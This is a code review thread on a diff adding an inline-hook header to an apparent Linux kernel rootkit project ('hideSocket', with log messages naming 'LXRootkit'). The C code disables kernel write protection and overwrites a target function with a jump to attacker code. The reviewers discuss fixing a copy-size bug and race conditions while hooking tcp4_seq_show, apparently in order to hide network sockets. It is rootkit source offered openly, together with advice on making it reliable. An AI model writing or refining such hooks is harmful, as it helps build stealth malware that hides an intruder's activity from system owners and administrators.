hideSocket/hfiles/inlHook.h

```diff
@@ -0,0 +1,64 @@
+
+#include <linux/kernel.h>
+#include <linux/module.h>
+
+#include "hardware.h" 
+
+struct inlHook 
+{
+    unsigned long targetFunc;   /* target function */
+    unsigned long myFunc;       /* our hook */
+}; 
+
+/* mov rax, [addr] pattern */ 
+static unsigned char movPattern[] = {  0x48, 0xC7, 0xC0, 0x00, 0x00, 0x00, 0x00};  
+/* jmp rax pattern */ 
+static unsigned char jmpPattern[] = { 0xFF, 0xE0 }; 
+
+static struct inlHook hook;
+
+void startHook(unsigned long toHook, unsigned long theHook)
+{
+
+    /* saving hook function address */ 
+    hook.myFunc = (unsigned long)theHook; 
+     
+    /* saving the target function address inorder to resume execution*/ 
+    hook.targetFunc = toHook; 
+    
+    /* moving the hook function address to RAX register */ 
+    *(unsigned long*)&movPattern[3] = (unsigned long)theHook;
+   
+    /* allocating a buffer for the pattern */ 
+    size_t szMovPattern = sizeof(movPattern); 
+    size_t szJmpPattern = sizeof(jmpPattern); 
+    unsigned char* buffer = (unsigned char*)kvzalloc(szMovPattern, GFP_KERNEL); 
+   
+    if(buffer == NULL) 
+    {
+        printk(KERN_INFO "[-] LXRootkit: kvzalloc() failed to allocate: %d bytes for the mov pattern\n", szMovPattern);
+        return; 
+    }
+
+    /* copying the pattern to the allocated buffer */ 
+    memcpy(buffer, movPattern, szMovPattern); 
+
+    wpOFF(); 
+
+    /* copying the rest of the pattern to the target function */ 
+    memcpy(toHook, buffer, sizeof(buffer));
```

Comment:
sizeof(buffer) is not the length of the buffer. You are copying here 8 bytes on `x64` system

Reply:
There is a problem here. You are copying 7 bytes of data. Some other thread can call the tcp4_seq_show function in the middle of the memcpy and it can cause a crash. Do you have an idea how to solve it?

Reply:
Yeah I think we can use some locking stuff, we can wrap it with a mutex and isolate it while copying.

Reply:
how mutex is going to help you?

Reply:
It will wrap the memcpy and enter a critical section which makes this memory non shared to other threads on the current processor, thus makes it reliable and it won't be messed up by another threads.

Reply:
no but think about it.  You need to protect the original function and not you code. If you will place a mutex around the memcpy it means that only one thread can do this memcpy at a given time. But thats not what you want.
You are placing a hook on a function and changing its code while a different thread you are not controlling can enter this function while you are changing the opcodes. It will immediatly crash due to invalid opcodes or wrong addresses.

Reply:
Oh yeah yeah you are right, maybe we can make it to execute on the current processor(core)? Wrap it with getcpu() and on exit putcpu()